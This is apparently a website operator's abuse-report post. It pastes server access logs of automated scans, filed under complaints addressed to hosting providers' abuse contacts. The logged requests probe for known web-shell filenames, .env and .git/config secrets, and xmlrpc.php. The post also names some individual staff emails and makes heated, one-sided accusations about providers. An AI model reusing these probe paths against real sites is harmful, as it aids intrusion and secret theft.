52.178.197.183 website*x.de – – [30/Aug/2025:09:25:37 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:25:48 +0200] „GET /gfile.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:26:03 +0200] „GET /aua.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:26:18 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:26:33 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:26:48 +0200] „GET /great.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:27:03 +0200] „GET /class9.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:27:19 +0200] „GET /pass.php HTTP/1.0“ 403 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:27:19 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:27:34 +0200] „GET /ot.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:27:49 +0200] „GET /witmm.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:28:04 +0200] „GET /lo.php HTTP/1.0“ 302 – „-“ „-“
52.178.197.183 website*x.de – – [30/Aug/2025:09:28:19 +0200] „GET /asd67.php HTTP/1.0“ 302 – „-“ „-“
+
4.217.248.220 website*x.de – – [30/Aug/2025:15:40:17 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:40:18 +0200] „GET /dejavu.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:40:32 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:40:48 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:41:03 +0200] „GET /.trash7309/index.php HTTP/1.0“ 403 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:41:03 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:41:18 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:41:33 +0200] „GET /NewFile.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:41:48 +0200] „GET /wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:42:03 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:42:03 +0200] „GET /wp-admin/wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:42:18 +0200] „GET /404.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:42:33 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:42:48 +0200] „GET /wp-admin/file.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:43:03 +0200] „GET /wp-content/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:43:03 +0200] „GET /law.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:43:18 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:43:33 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:43:48 +0200] „GET /file3.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:44:03 +0200] „GET /file4.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:44:18 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:44:33 +0200] „GET /file6.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:44:48 +0200] „GET /file8.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:45:03 +0200] „GET /file9.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:45:18 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
4.217.248.220 website*x.de – – [30/Aug/2025:15:45:33 +0200] „GET /faq.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 13 TODAY!
abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@datacamp.co.uk,
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
HERE WITH 3 IP´S! – VERY UNSECURE PROVIDER!!!
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:00 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:01 +0200] „GET /wp-admin/function.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:16 +0200] „GET /ALFA_DATA/index.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:16 +0200] „GET /mah.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:31 +0200] „GET /makeasmtp.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:46 +0200] „GET /wp-content/uploads/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:46 +0200] „GET /.well-known/content.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:46 +0200] „GET /uploads/bigdump.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:47 +0200] „GET /wp-content/content.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:47 +0200] „GET /phpshelldownload.com/index.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:47:47 +0200] „GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:02 +0200] „GET /wp-includes/Text/Diff/alfa-rex.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:02 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:17 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:32 +0200] „GET /wp-includes/pomo/pomo.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:33 +0200] „GET /config.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:48 +0200] „GET /wp-includes/css/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:48 +0200] „GET /wp-includes/fonts/index.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:48:48 +0200] „GET /wp-admin/autoload_classmap.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:49:03 +0200] „GET /post.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:49:18 +0200] „GET /wp-includes/Text/Diff/Renderer/about.php HTTP/1.0“ 403 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:49:18 +0200] „GET /index.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:49:33 +0200] „GET /wp-admin/admin-post.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:49:48 +0200] „GET /wp-admin/css/colors/blue/about.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:50:03 +0200] „GET /cong.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:50:18 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
104.215.63.112 website*x.com – – [30/Aug/2025:13:50:33 +0200] „GET /content.php HTTP/1.0“ 302 – „-“ „-“
+
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:20 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:20 +0200] „GET /dejavu.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:22 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:22 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:23 +0200] „GET /.trash7309/index.php HTTP/1.0“ 403 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:23 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:24 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:24 +0200] „GET /NewFile.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:25 +0200] „GET /wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:25 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:26 +0200] „GET /wp-admin/wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:26 +0200] „GET /404.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:27 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:28 +0200] „GET /wp-admin/file.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:28 +0200] „GET /wp-content/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:28 +0200] „GET /law.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:29 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:30 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:30 +0200] „GET /file3.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:31 +0200] „GET /file4.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:31 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:32 +0200] „GET /file6.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:33 +0200] „GET /file8.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:33 +0200] „GET /file9.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:34 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
52.230.12.90 website*x.com – – [30/Aug/2025:20:02:34 +0200] „GET /faq.php HTTP/1.0“ 302 – „-“ „-„+
+
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:15 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:15 +0200] „GET /new.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:17 +0200] „GET /num.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:17 +0200] „GET /sty.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:18 +0200] „GET /JPG.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:18 +0200] „GET /login.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:19 +0200] „GET /wp-xml.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:19 +0200] „GET /pn.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:20 +0200] „GET /log.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:20 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:21 +0200] „GET /new4.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:21 +0200] „GET /wp/sih.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:21 +0200] „GET /class-wp-header.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:22 +0200] „GET /dox.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:22 +0200] „GET /post.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:23 +0200] „GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:23 +0200] „GET /wp-content/themes/twentytwentytwo/index.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:23 +0200] „GET /wp-content/plugins/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:23 +0200] „GET /wp-admin/includes/xmrlpc.php HTTP/1.0“ 302 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:24 +0200] „GET /wp-includes/blocks/chosen.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:24 +0200] „GET /wp-content/themes/twentytwentytwo/alfa-rex.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:24 +0200] „GET /images/Marvins.php HTTP/1.0“ 403 – „-“ „-“
52.187.163.144 website*x.com – – [30/Aug/2025:23:32:25 +0200] „GET /wp-admin/doc.php HTTP/1.0“ 302 – „-“ „-“
AS212238 – Datacamp Limited
abuse@datacamp.co.uk
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:54 +0200] „GET /wp-includes/customize/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:55 +0200] „GET /wp-includes/blocks/shortcode/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:55 +0200] „GET /wp-includes/js/crop/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:55 +0200] „GET /wp-content/languages/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:55 +0200] „GET /wp-includes/css/dist/list-reusable-blocks/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:55 +0200] „GET /wp-includes/Requests/src/Auth/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:56 +0200] „GET /wp-admin/css/colors/midnight/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:56 +0200] „GET /wp-admin/js/widgets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:56 +0200] „GET /wp-includes/blocks/site-logo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:56 +0200] „GET /wp-includes/Requests/Proxy/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:56 +0200] „GET /wp-includes/Text/Diff/Engine/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:56 +0200] „GET /wp-includes/SimplePie/Content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:57 +0200] „GET /wp-content/plugins/elementor/assets/images/app/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:57 +0200] „GET /wp-includes/blocks/loginout/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:57 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:57 +0200] „GET /wp-includes/l10n/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
138.199.42.138 website*x.com – – [30/Aug/2025:18:29:57 +0200] „GET /images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
… and so on… and so on!!!

MAIL NR. 14 TODAY!
abuse.br@telefonica.com,Vikas.Mate@tatacommunications.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,
AS18881 – TELEFÔNICA BRASIL S.A – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse.br@telefonica.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2804:7f7:df02:2e98:1c7a:2a91:9af:c045 website*x.com – – [30/Aug/2025:12:56:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/100.0.0.0 Safari/537.36“
AS17762 – Tata Teleservices Maharashtra Ltd – IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
Vikas.Mate@tatacommunications.com
123.252.137.30 website*x.com – – [30/Aug/2025:12:56:49 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/71.0.0.0 Safari/537.36“
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
4.230.6.228 website*x.com – – [30/Aug/2025:14:18:40 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:18:41 +0200] „GET /dejavu.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:18:56 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:19:11 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:19:26 +0200] „GET /.trash7309/index.php HTTP/1.0“ 403 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:19:26 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:19:41 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:19:56 +0200] „GET /NewFile.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:20:11 +0200] „GET /wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:20:26 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:20:37 +0200] „GET /wp-admin/wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:20:52 +0200] „GET /404.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:21:07 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:21:22 +0200] „GET /wp-admin/file.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:21:37 +0200] „GET /wp-content/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:21:38 +0200] „GET /law.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:21:53 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:22:08 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:22:23 +0200] „GET /file3.php HTTP/1.0“ 302 – „-“ „-“
4.230.6.228 website*x.com – – [30/Aug/2025:14:22:38 +0200] „GET /file4.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 15 TODAY!
ip.abuse@ril.com, seldomar@grupobrisanet.com.br
AS55836 – Reliance Jio Infocomm Limited – AGAIN AND AGAIN! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ip.abuse@ril.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2405:201:3035:a042:58ea:fd60:9921:65bd website*x.com – – [30/Aug/2025:16:46:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS28126 – BRISANET SERVICOS DE TELECOMUNICACOES S.A – AGAIN AND AGAIN! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
seldomar@grupobrisanet.com.br – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2804:29b8:5423:d3a:69c3:c6f6:a75a:e6f4 website*x.com – – [30/Aug/2025:16:46:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

MAIL NR. 16 TODAY!
bucklog@proton.me,contact@proton.me,enterprise@protonmail.com,abuse@protonmail.com,abuse@virtualine.org
AS211590 – Bucklog SARL – AGAIN AND AGAIN! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:04 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:05 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:05 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:05 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:05 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:05 +0200] „GET /tool/view/phpinfo.view.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:05 +0200] „GET /test.php HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:11 +0200] „GET /app_dev.php/_profiler/phpinfo HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:17 +0200] „GET /phpinfo=1 HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:17 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:22 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.30 website*x.com – – [30/Aug/2025:16:52:22 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“
AS214940 – KPROHOST LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
198.55.98.93 website*x.com – – [31/Aug/2025:09:39:32 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16“

MAIL NR. 17 TODAY!
abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,
AS141995 – Contabo Asia Private Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
